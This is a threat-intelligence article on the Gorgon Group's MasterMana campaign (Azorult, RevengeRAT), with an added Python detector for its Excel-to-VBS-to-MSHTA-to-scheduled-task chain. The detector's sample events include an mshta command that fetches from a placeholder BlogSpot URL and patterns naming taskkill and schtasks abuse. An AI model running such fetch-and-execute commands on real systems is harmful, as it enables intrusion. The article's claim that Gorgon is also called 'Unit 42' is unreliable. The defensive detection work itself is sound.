Gorgon Group: The Gorgon Group has been identified with high confidence by researchers at Prevailion as the actor behind the MasterMana campaign. The group is using the campaign to deliver the Azorult Trojan and RevengeRAT (Remote Access Trojan) to victims via phishing emails. Gorgon is a known state-sponsored group that is believed to be connected to Pakistan and is also referred to as Unit 42. The newest campaign appears to be focused primarily on financial gain and reaches victims through a phishing email carrying a Microsoft Excel attachment, which drops a VBS script payload. The script opens a BlogSpot website that launches the Microsoft HTML Application Host (MSHTA) utility, which in turn opens a second payload hosted on Pastebin. The second payload kills any running Microsoft Excel, Word, PowerPoint and Publisher processes and sets up scheduled tasks and registry keys for persistence.

From here, two different cases are possible. In one instance, the campaign delivers RevengeRAT, which is capable of opening remote shells, allowing an attacker to manage system files and services as well as edit the Windows registry, log keystrokes, access the webcam, and harvest credentials. In the other case, the campaign drops the Azorult Trojan, which is designed to exfiltrate as much sensitive information from victims as possible, including, but not limited to, banking credentials, cryptocurrency wallets and files, passwords, browser history, and cookies. According to Prevailion, the group struck a “perfect balance” in this campaign, keeping it small enough to go undetected while still operating at a high rate.
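As an added, defender-side example (not code from Prevailion's report or from the campaign itself), the following Python flags the process chain described above when run over constructed Windows process-creation events. The event field names (`parent`, `image`, `cmdline`) and the sample values are assumptions for this example.

```python
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "mspub.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
FREE_HOSTING = re.compile(r"blogspot\.com|pastebin\.com", re.IGNORECASE)

def _exe(path):
    """Lower-case file name of an image path, accepting / or \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the MasterMana chain stages one event matches (empty if none)."""
    parent, image = _exe(event["parent"]), _exe(event["image"])
    cmd = event["cmdline"].lower()
    hits = []
    if parent in OFFICE and image in SCRIPT_HOSTS:  # Excel running the dropped VBS
        hits.append("office_spawns_script_host")
    if image == "mshta.exe" and FREE_HOSTING.search(cmd):  # MSHTA fed from BlogSpot/Pastebin
        hits.append("mshta_free_hosting_url")
    if image == "taskkill.exe" and any(p in cmd for p in OFFICE):  # Office apps being killed
        hits.append("office_process_kill")
    if image == "schtasks.exe" and "/create" in cmd and parent in SCRIPT_HOSTS | {"mshta.exe"}:
        hits.append("scripted_scheduled_task")  # persistence created by a script host
    return hits

def detect(events):
    """Sorted distinct stages seen on one host; two or more is the chain, not noise."""
    stages = set()
    for ev in events:
        stages.update(classify(ev))
    return sorted(stages)

SAMPLE_EVENTS = [  # constructed events for this example, not real telemetry
    {"parent": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\Public\invoice.vbs"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://PLACEHOLDER.blogspot.com/"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /f /im winword.exe"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /create /sc hourly /tn PLACEHOLDER /tr PLACEHOLDER"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]
```

Each stage on its own (an Office app spawning a script host, MSHTA reaching a free hosting site) can occur legitimately; the point of `detect` is to escalate only when several stages appear together on one host.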
This attack campaign can be seen as a “budget” campaign because of the low cost to the group of carrying it out. The group relied predominantly on free services, from the email accounts used to send the phishing messages to Pastebin for hosting the payloads it downloads. The group also used an older Trojan that cost approximately $100, making its cost for this campaign virtually zero. It is possible that, now the campaign has been exposed, the group will find another low-budget RAT and continue using the same free services to keep operating costs low. If IT and security staff fail to update defenses to detect this attack, it is also possible that the group will keep using the same attack tools for as long as they keep working.